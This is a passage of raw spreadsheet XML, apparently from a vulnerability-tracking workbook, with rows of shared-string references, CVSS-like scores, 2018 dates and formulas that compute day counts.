        <v>441</v>
      </c>
      <c r="D26" s="4" t="s">
        <v>442</v>
      </c>
      <c r="E26" s="4" t="s">
        <v>443</v>
      </c>
      <c r="F26" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G26" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H26" s="4">
        <v>2</v>
      </c>
      <c r="I26" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J26" s="4" t="s">
        <v>444</v>
      </c>
      <c r="K26" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L26" s="4">
        <f>IF(out!$G26="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M26" s="5" t="s">
        <v>445</v>
      </c>
      <c r="N26" s="12" t="s">
        <v>446</v>
      </c>
      <c r="O26" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-29</v>
      </c>
      <c r="P26" s="12" t="s">
        <v>447</v>
      </c>
      <c r="Q26" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-15</v>
      </c>
      <c r="R26" s="18">
        <f t="shared" si="2"/>
        <v>76</v>
      </c>
      <c r="S26" s="4"/>
      <c r="T26" s="4" t="s">
        <v>448</v>
      </c>
      <c r="U26" s="4" t="s">
        <v>449</v>
      </c>
      <c r="V26" s="7" t="s">
        <v>450</v>
      </c>
    </row>
    <row r="27" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A27" s="3" t="s">
        <v>425</v>
      </c>
      <c r="B27" s="4" t="s">
        <v>426</v>
      </c>
      <c r="C27" s="4" t="s">
        <v>427</v>
      </c>
      <c r="D27" s="4" t="s">
        <v>428</v>
      </c>
      <c r="E27" s="4" t="s">
        <v>429</v>
      </c>
      <c r="F27" s="4" t="s">
        <v>430</v>
      </c>
      <c r="G27" s="4" t="s">
        <v>431</v>
      </c>
      <c r="H27" s="4">
        <v>2</v>
      </c>
      <c r="I27" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J27" s="4" t="s">
        <v>432</v>
      </c>
      <c r="K27" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L27" s="4">
        <f>IF(out!$G27="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M27" s="5" t="s">
        <v>433</v>
      </c>
      <c r="N27" s="12" t="s">
        <v>434</v>
      </c>
      <c r="O27" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-01-30</v>
      </c>
      <c r="P27" s="12" t="s">
        <v>435</v>
      </c>
      <c r="Q27" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-15</v>
      </c>
      <c r="R27" s="18">
        <f t="shared" si="2"/>
        <v>75</v>
      </c>
      <c r="S27" s="4"/>
      <c r="T27" s="4" t="s">
        <v>436</v>
      </c>
      <c r="U27" s="4" t="s">
        <v>437</v>
      </c>
      <c r="V27" s="7" t="s">
        <v>438</v>
      </c>
    </row>
    <row r="28" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A28" s="3" t="s">
        <v>411</v>
      </c>
      <c r="B28" s="4" t="s">
        <v>412</v>
      </c>
      <c r="C28" s="4" t="s">
        <v>413</v>
      </c>
      <c r="D28" s="4" t="s">
        <v>414</v>
      </c>
      <c r="E28" s="4" t="s">
        <v>415</v>
      </c>
      <c r="F28" s="4" t="s">
        <v>416</v>
      </c>
      <c r="G28" s="4" t="s">
        <v>417</v>
      </c>
      <c r="H28" s="4">
        <v>2</v>
      </c>
      <c r="I28" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J28" s="4" t="s">
        <v>418</v>
      </c>
      <c r="K28" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L28" s="4">
        <f>IF(out!$G28="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M28" s="5" t="s">
        <v>419</v>
      </c>
      <c r="N28" s="12" t="s">
        <v>420</v>
      </c>
      <c r="O28" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-01</v>
      </c>
      <c r="P28" s="12" t="s">
        <v>421</v>
      </c>
      <c r="Q28" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-15</v>
      </c>
      <c r="R28" s="18">
        <f t="shared" si="2"/>
        <v>73</v>
      </c>
      <c r="S28" s="4"/>
      <c r="T28" s="4" t="s">
        <v>422</v>
      </c>
      <c r="U28" s="4" t="s">
        <v>423</v>
      </c>
      <c r="V28" s="7" t="s">
        <v>424</v>
      </c>
    </row>
    <row r="29" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A29" s="3" t="s">
        <v>370</v>
      </c>
      <c r="B29" s="4" t="s">
        <v>371</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>372</v>
      </c>
      <c r="D29" s="4" t="s">
        <v>373</v>
      </c>
      <c r="E29" s="4" t="s">
        <v>374</v>
      </c>
      <c r="F29" s="4" t="s">
        <v>375</v>
      </c>
      <c r="G29" s="4" t="s">
        <v>376</v>
      </c>
      <c r="H29" s="4">
        <v>7.8</v>
      </c>
      <c r="I29" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J29" s="4" t="s">
        <v>377</v>
      </c>
      <c r="K29" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L29" s="4">
        <f>IF(out!$G29="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M29" s="5" t="s">
        <v>378</v>
      </c>
      <c r="N29" s="12" t="s">
        <v>379</v>
      </c>
      <c r="O29" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-29</v>
      </c>
      <c r="P29" s="12" t="s">
        <v>380</v>
      </c>
      <c r="Q29" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-19</v>
      </c>
      <c r="R29" s="18">
        <f t="shared" si="2"/>
        <v>21</v>
      </c>
      <c r="S29" s="5" t="s">
        <v>381</v>
      </c>
      <c r="T29" s="4" t="s">
        <v>382</v>
      </c>
      <c r="U29" s="4" t="s">
        <v>383</v>
      </c>
      <c r="V29" s="7" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="30" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A30" s="3" t="s">
        <v>399</v>
      </c>
      <c r="B30" s="4" t="s">
        <v>400</v>
      </c>
      <c r="C30" s="4" t="s">
        <v>401</v>
      </c>
      <c r="D30" s="4" t="s">
        <v>402</v>
      </c>
      <c r="E30" s="4" t="s">
        <v>403</v>
      </c>
      <c r="F30" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G30" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H30" s="4">
        <v>8.6</v>
      </c>
      <c r="I30" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J30" s="4" t="s">
        <v>404</v>
      </c>
      <c r="K30" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L30" s="4">
        <f>IF(out!$G30="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M30" s="5" t="s">
        <v>405</v>
      </c>
      <c r="N30" s="12" t="s">
        <v>406</v>
      </c>
      <c r="O30" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-06</v>
      </c>
      <c r="P30" s="12" t="s">
        <v>407</v>
      </c>
      <c r="Q30" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-24</v>
      </c>
      <c r="R30" s="18">
        <f t="shared" si="2"/>
        <v>77</v>
      </c>
      <c r="S30" s="4"/>
      <c r="T30" s="4" t="s">
        <v>408</v>
      </c>
      <c r="U30" s="4" t="s">
        <v>409</v>
      </c>
      <c r="V30" s="7" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="31" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A31" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B31" s="4" t="s">
        <v>386</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>387</v>
      </c>
      <c r="D31" s="4" t="s">
        <v>388</v>
      </c>
      <c r="E31" s="4" t="s">
        <v>389</v>
      </c>
      <c r="F31" s="4" t="s">
        <v>390</v>
      </c>
      <c r="G31" s="4" t="s">
        <v>391</v>
      </c>
      <c r="H31" s="4">
        <v>8.5</v>
      </c>
      <c r="I31" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J31" s="4" t="s">
        <v>392</v>
      </c>
      <c r="K31" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L31" s="4">
        <f>IF(out!$G31="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M31" s="5" t="s">
        <v>393</v>
      </c>
      <c r="N31" s="12" t="s">
        <v>394</v>
      </c>
      <c r="O31" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-04-20</v>
      </c>
      <c r="P31" s="12" t="s">
        <v>395</v>
      </c>
      <c r="Q31" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-25</v>
      </c>
      <c r="R31" s="18">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S31" s="4"/>
      <c r="T31" s="4" t="s">
        <v>396</v>
      </c>
      <c r="U31" s="4" t="s">
        <v>397</v>
      </c>
      <c r="V31" s="7" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="32" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A32" s="3" t="s">
        <v>233</v>
      </c>
      <c r="B32" s="4" t="s">
        <v>234</v>
      </c>
      <c r="C32" s="4" t="s">
        <v>235</v>
      </c>
      <c r="D32" s="4" t="s">
        <v>236</v>
      </c>
      <c r="E32" s="4" t="s">
        <v>237</v>
      </c>
      <c r="F32" s="4" t="s">
        <v>238</v>
      </c>
      <c r="G32" s="4" t="s">
        <v>239</v>
      </c>
      <c r="H32" s="4">
        <v>8.6</v>
      </c>
      <c r="I32" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J32" s="4" t="s">
        <v>240</v>
      </c>
      <c r="K32" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L32" s="4">
        <f>IF(out!$G32="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M32" s="5" t="s">
        <v>241</v>
      </c>
      <c r="N32" s="12" t="s">
        <v>242</v>
      </c>
      <c r="O32" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-27</v>
      </c>
      <c r="P32" s="12" t="s">
        <v>243</v>
      </c>
      <c r="Q32" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-26</v>
      </c>
      <c r="R32" s="18">
        <f t="shared" si="2"/>
        <v>30</v>
      </c>
      <c r="S32" s="4"/>
      <c r="T32" s="4" t="s">
        <v>244</v>
      </c>
      <c r="U32" s="4" t="s">
        <v>245</v>
      </c>
      <c r="V32" s="7" t="s">
        <v>246</v>
      </c>
    </row>
    <row r="33" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A33" s="3" t="s">
        <v>355</v>
      </c>
      <c r="B33" s="4" t="s">
        <v>356</v>
      </c>
      <c r="C33" s="4" t="s">
        <v>357</v>
      </c>
      <c r="D33" s="4" t="s">
        <v>358</v>
      </c>
      <c r="E33" s="4" t="s">
        <v>359</v>
      </c>
      <c r="F33" s="4" t="s">
        <v>360</v>
      </c>
      <c r="G33" s="4" t="s">
        <v>361</v>
      </c>
      <c r="H33" s="4">
        <v>6.5</v>
      </c>
      <c r="I33" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J33" s="4" t="s">
        <v>362</v>
      </c>
      <c r="K33" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L33" s="4">
        <f>IF(out!$G33="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M33" s="5" t="s">
        <v>363</v>
      </c>
      <c r="N33" s="12" t="s">
        <v>364</v>
      </c>
      <c r="O33" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-27</v>
      </c>
      <c r="P33" s="12" t="s">
        <v>365</v>
      </c>
      <c r="Q33" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-28</v>
      </c>
      <c r="R33" s="18">
        <f t="shared" si="2"/>
        <v>60</v>
      </c>
      <c r="S33" s="4" t="s">
        <v>366</v>
      </c>
      <c r="T33" s="5" t="s">
        <v>367</v>
      </c>
      <c r="U33" s="4" t="s">
        <v>368</v>
      </c>
      <c r="V33" s="8" t="s">
        <v>369</v>
      </c>
    </row>
    <row r="34" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A34" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B34" s="4" t="s">
        <v>343</v>
      </c>
      <c r="C34" s="4" t="s">
        <v>344</v>
      </c>
      <c r="D34" s="4" t="s">
        <v>345</v>
      </c>
      <c r="E34" s="4" t="s">
        <v>346</v>
      </c>
      <c r="F34" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G34" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H34" s="4">
        <v>7.5</v>
      </c>
      <c r="I34" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J34" s="4" t="s">
        <v>347</v>
      </c>
      <c r="K34" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L34" s="4">
        <f>IF(out!$G34="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M34" s="5" t="s">
        <v>348</v>
      </c>
      <c r="N34" s="12" t="s">
        <v>349</v>
      </c>
      <c r="O34" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-28</v>
      </c>
      <c r="P34" s="12" t="s">
        <v>350</v>
      </c>
      <c r="Q34" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-28</v>
      </c>
      <c r="R34" s="18">
        <f t="shared" si="2"/>
        <v>59</v>
      </c>
      <c r="S34" s="4" t="s">
        <v>351</v>
      </c>
      <c r="T34" s="4" t="s">
        <v>352</v>
      </c>
      <c r="U34" s="4" t="s">
        <v>353</v>
      </c>
      <c r="V34" s="7" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="35" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A35" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B35" s="4" t="s">
        <v>291</v>
      </c>
      <c r="C35" s="4" t="s">
        <v>292</v>
      </c>
      <c r="D35" s="4" t="s">
        <v>293</v>
      </c>
      <c r="E35" s="4" t="s">
        <v>294</v>
      </c>
      <c r="F35" s="4" t="s">
        <v>295</v>
      </c>
      <c r="G35" s="4" t="s">
        <v>296</v>
      </c>
      <c r="H35" s="4">
        <v>8.6</v>
      </c>
      <c r="I35" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J35" s="4" t="s">
        <v>297</v>
      </c>
      <c r="K35" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L35" s="4">
        <f>IF(out!$G35="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M35" s="5" t="s">
        <v>298</v>
      </c>
      <c r="N35" s="12" t="s">
        <v>299</v>
      </c>
      <c r="O35" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-26</v>
      </c>
      <c r="P35" s="12" t="s">
        <v>300</v>
      </c>
      <c r="Q35" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-04-29</v>
      </c>
      <c r="R35" s="18">
        <f t="shared" si="2"/>
        <v>62</v>
      </c>
      <c r="S35" s="5" t="s">
        <v>301</v>
      </c>
      <c r="T35" s="4" t="s">
        <v>302</v>
      </c>
      <c r="U35" s="4" t="s">
        <v>303</v>
      </c>
      <c r="V35" s="7" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="36" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A36" s="3" t="s">
        <v>133</v>
      </c>
      <c r="B36" s="4" t="s">
        <v>134</v>
      </c>
      <c r="C36" s="4" t="s">
        <v>135</v>
      </c>
      <c r="D36" s="4" t="s">
        <v>136</v>
      </c>
      <c r="E36" s="4" t="s">
        <v>137</v>
      </c>
      <c r="F36" s="4" t="s">
        <v>138</v>
      </c>
      <c r="G36" s="4" t="s">
        <v>139</v>
      </c>
      <c r="H36" s="4">
        <v>5.2</v>
      </c>
      <c r="I36" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J36" s="4" t="s">
        <v>140</v>
      </c>
      <c r="K36" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L36" s="4">
        <f>IF(out!$G36="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M36" s="5" t="s">
        <v>141</v>
      </c>
      <c r="N36" s="12" t="s">
        <v>142</v>
      </c>
      <c r="O36" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-03</v>
      </c>
      <c r="P36" s="12" t="s">
        <v>143</v>
      </c>
      <c r="Q36" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R36" s="18">
        <f t="shared" si="2"/>
        <v>69</v>
      </c>
      <c r="S36" s="4" t="s">
        <v>144</v>
      </c>
      <c r="T36" s="5" t="s">
        <v>145</v>
      </c>
      <c r="U36" s="4" t="s">
        <v>146</v>
      </c>
      <c r="V36" s="8" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="37" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A37" s="3" t="s">
        <v>166</v>
      </c>
      <c r="B37" s="4" t="s">
        <v>167</v>
      </c>
      <c r="C37" s="4" t="s">
        <v>168</v>
      </c>
      <c r="D37" s="4" t="s">
        <v>169</v>
      </c>
      <c r="E37" s="4" t="s">
        <v>170</v>
      </c>
      <c r="F37" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G37" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H37" s="4">
        <v>9.6</v>
      </c>
      <c r="I37" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J37" s="4" t="s">
        <v>171</v>
      </c>
      <c r="K37" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L37" s="4">
        <f>IF(out!$G37="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M37" s="5" t="s">
        <v>172</v>
      </c>
      <c r="N37" s="12" t="s">
        <v>173</v>
      </c>
      <c r="O37" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-11</v>
      </c>
      <c r="P37" s="12" t="s">
        <v>174</v>
      </c>
      <c r="Q37" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R37" s="18">
        <f t="shared" si="2"/>
        <v>61</v>
      </c>
      <c r="S37" s="4" t="s">
        <v>175</v>
      </c>
      <c r="T37" s="4" t="s">
        <v>176</v>
      </c>
      <c r="U37" s="4" t="s">
        <v>177</v>
      </c>
      <c r="V37" s="7" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="38" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A38" s="3" t="s">
        <v>247</v>
      </c>
      <c r="B38" s="4" t="s">
        <v>248</v>
      </c>
      <c r="C38" s="4" t="s">
        <v>249</v>
      </c>
      <c r="D38" s="4" t="s">
        <v>250</v>
      </c>
      <c r="E38" s="4" t="s">
        <v>251</v>
      </c>
      <c r="F38" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G38" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H38" s="4">
        <v>8.6</v>
      </c>
      <c r="I38" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J38" s="4" t="s">
        <v>252</v>
      </c>
      <c r="K38" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L38" s="4">
        <f>IF(out!$G38="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M38" s="5" t="s">
        <v>253</v>
      </c>
      <c r="N38" s="12" t="s">
        <v>254</v>
      </c>
      <c r="O38" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-25</v>
      </c>
      <c r="P38" s="12" t="s">
        <v>255</v>
      </c>
      <c r="Q38" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R38" s="18">
        <f t="shared" si="2"/>
        <v>47</v>
      </c>
      <c r="S38" s="4" t="s">
        <v>256</v>
      </c>
      <c r="T38" s="4" t="s">
        <v>257</v>
      </c>
      <c r="U38" s="4" t="s">
        <v>258</v>
      </c>
      <c r="V38" s="7" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="39" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A39" s="3" t="s">
        <v>94</v>
      </c>
      <c r="B39" s="4" t="s">
        <v>95</v>
      </c>
      <c r="C39" s="4" t="s">
        <v>96</v>
      </c>
      <c r="D39" s="4" t="s">
        <v>97</v>
      </c>
      <c r="E39" s="4" t="s">
        <v>98</v>
      </c>
      <c r="F39" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G39" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H39" s="4">
        <v>10</v>
      </c>
      <c r="I39" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J39" s="4" t="s">
        <v>99</v>
      </c>
      <c r="K39" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L39" s="4">
        <f>IF(out!$G39="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M39" s="5" t="s">
        <v>100</v>
      </c>
      <c r="N39" s="12" t="s">
        <v>101</v>
      </c>
      <c r="O39" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-29</v>
      </c>
      <c r="P39" s="12" t="s">
        <v>102</v>
      </c>
      <c r="Q39" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R39" s="18">
        <f t="shared" si="2"/>
        <v>43</v>
      </c>
      <c r="S39" s="4" t="s">
        <v>103</v>
      </c>
      <c r="T39" s="4" t="s">
        <v>104</v>
      </c>
      <c r="U39" s="4" t="s">
        <v>105</v>
      </c>
      <c r="V39" s="7" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="40" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A40" s="3" t="s">
        <v>192</v>
      </c>
      <c r="B40" s="4" t="s">
        <v>193</v>
      </c>
      <c r="C40" s="4" t="s">
        <v>194</v>
      </c>
      <c r="D40" s="4" t="s">
        <v>195</v>
      </c>
      <c r="E40" s="4" t="s">
        <v>196</v>
      </c>
      <c r="F40" s="4" t="s">
        <v>197</v>
      </c>
      <c r="G40" s="4" t="s">
        <v>198</v>
      </c>
      <c r="H40" s="4">
        <v>10</v>
      </c>
      <c r="I40" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J40" s="4" t="s">
        <v>199</v>
      </c>
      <c r="K40" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L40" s="4">
        <f>IF(out!$G40="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M40" s="5" t="s">
        <v>200</v>
      </c>
      <c r="N40" s="12" t="s">
        <v>201</v>
      </c>
      <c r="O40" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-11</v>
      </c>
      <c r="P40" s="12" t="s">
        <v>202</v>
      </c>
      <c r="Q40" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R40" s="18">
        <f t="shared" si="2"/>
        <v>61</v>
      </c>
      <c r="S40" s="4" t="s">
        <v>203</v>
      </c>
      <c r="T40" s="4" t="s">
        <v>204</v>
      </c>
      <c r="U40" s="4" t="s">
        <v>205</v>
      </c>
      <c r="V40" s="7" t="s">
        <v>206</v>
      </c>
    </row>
    <row r="41" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A41" s="3" t="s">
        <v>260</v>
      </c>
      <c r="B41" s="4" t="s">
        <v>261</v>
      </c>
      <c r="C41" s="4" t="s">
        <v>262</v>
      </c>
      <c r="D41" s="4" t="s">
        <v>263</v>
      </c>
      <c r="E41" s="4" t="s">
        <v>264</v>
      </c>
      <c r="F41" s="4" t="s">
        <v>265</v>
      </c>
      <c r="G41" s="4" t="s">
        <v>266</v>
      </c>
      <c r="H41" s="4">
        <v>10</v>
      </c>
      <c r="I41" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J41" s="4" t="s">
        <v>267</v>
      </c>
      <c r="K41" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L41" s="4">
        <f>IF(out!$G41="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M41" s="5" t="s">
        <v>268</v>
      </c>
      <c r="N41" s="12" t="s">
        <v>269</v>
      </c>
      <c r="O41" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-25</v>
      </c>
      <c r="P41" s="12" t="s">
        <v>270</v>
      </c>
      <c r="Q41" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R41" s="18">
        <f t="shared" si="2"/>
        <v>75</v>
      </c>
      <c r="S41" s="4" t="s">
        <v>271</v>
      </c>
      <c r="T41" s="4" t="s">
        <v>272</v>
      </c>
      <c r="U41" s="4" t="s">
        <v>273</v>
      </c>
      <c r="V41" s="7" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="42" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A42" s="3" t="s">
        <v>207</v>
      </c>
      <c r="B42" s="4" t="s">
        <v>208</v>
      </c>
      <c r="C42" s="4" t="s">
        <v>209</v>
      </c>
      <c r="D42" s="4" t="s">
        <v>210</v>
      </c>
      <c r="E42" s="4" t="s">
        <v>211</v>
      </c>
      <c r="F42" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G42" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H42" s="4">
        <v>7.1</v>
      </c>
      <c r="I42" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J42" s="4" t="s">
        <v>214</v>
      </c>
      <c r="K42" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L42" s="4">
        <f>IF(out!$G42="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M42" s="5" t="s">
        <v>215</v>
      </c>
      <c r="N42" s="12" t="s">
        <v>216</v>
      </c>
      <c r="O42" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-03</v>
      </c>
      <c r="P42" s="12" t="s">
        <v>217</v>
      </c>
      <c r="Q42" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R42" s="18">
        <f t="shared" si="2"/>
        <v>69</v>
      </c>
      <c r="S42" s="5" t="s">
        <v>188</v>
      </c>
      <c r="T42" s="5" t="s">
        <v>145</v>
      </c>
      <c r="U42" s="4" t="s">
        <v>218</v>
      </c>
      <c r="V42" s="8" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="43" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A43" s="3" t="s">
        <v>219</v>
      </c>
      <c r="B43" s="4" t="s">
        <v>220</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>221</v>
      </c>
      <c r="D43" s="4" t="s">
        <v>222</v>
      </c>
      <c r="E43" s="4" t="s">
        <v>223</v>
      </c>
      <c r="F43" s="4" t="s">
        <v>224</v>
      </c>
      <c r="G43" s="4" t="s">
        <v>225</v>
      </c>
      <c r="H43" s="4">
        <v>5.2</v>
      </c>
      <c r="I43" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J43" s="4" t="s">
        <v>226</v>
      </c>
      <c r="K43" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L43" s="4">
        <f>IF(out!$G43="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M43" s="5" t="s">
        <v>227</v>
      </c>
      <c r="N43" s="12" t="s">
        <v>228</v>
      </c>
      <c r="O43" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-03-27</v>
      </c>
      <c r="P43" s="12" t="s">
        <v>229</v>
      </c>
      <c r="Q43" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-11</v>
      </c>
      <c r="R43" s="18">
        <f t="shared" si="2"/>
        <v>45</v>
      </c>
      <c r="S43" s="4" t="s">
        <v>230</v>
      </c>
      <c r="T43" s="4" t="s">
        <v>231</v>
      </c>
      <c r="U43" s="4" t="s">
        <v>232</v>
      </c>
      <c r="V43" s="7" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="44" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A44" s="3" t="s">
        <v>275</v>
      </c>
      <c r="B44" s="4" t="s">
        <v>276</v>
      </c>
      <c r="C44" s="4" t="s">
        <v>277</v>
      </c>
      <c r="D44" s="4" t="s">
        <v>278</v>
      </c>
      <c r="E44" s="4" t="s">
        <v>279</v>
      </c>
      <c r="F44" s="4" t="s">
        <v>280</v>
      </c>
      <c r="G44" s="4" t="s">
        <v>281</v>
      </c>
      <c r="H44" s="4">
        <v>7.4</v>
      </c>
      <c r="I44" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J44" s="4" t="s">
        <v>282</v>
      </c>
      <c r="K44" s="4" t="b">
        <v>0</v>
      </c>
      <c r="L44" s="4">
        <f>IF(out!$G44="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M44" s="5" t="s">
        <v>283</v>
      </c>
      <c r="N44" s="12" t="s">
        <v>284</v>
      </c>
      <c r="O44" s="13" t="str">
        <f t="shared" si="0"/>
        <v>2018-02-27</v>
      </c>
      <c r="P44" s="12" t="s">
        <v>285</v>
      </c>
      <c r="Q44" s="13" t="str">
        <f t="shared" si="1"/>
        <v>2018-05-12</v>
      </c>
      <c r="R44" s="18">
        <f t="shared" si="2"/>
        <v>74</v>
      </c>
      <c r="S44" s="4" t="s">
        <v>286</v>
      </c>
      <c r="T44" s="5" t="s">
        <v>287</v>
      </c>
      <c r="U44" s="4" t="s">
        <v>288</v>
      </c>
      <c r="V44" s="8" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="45" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A45" s="3" t="s">
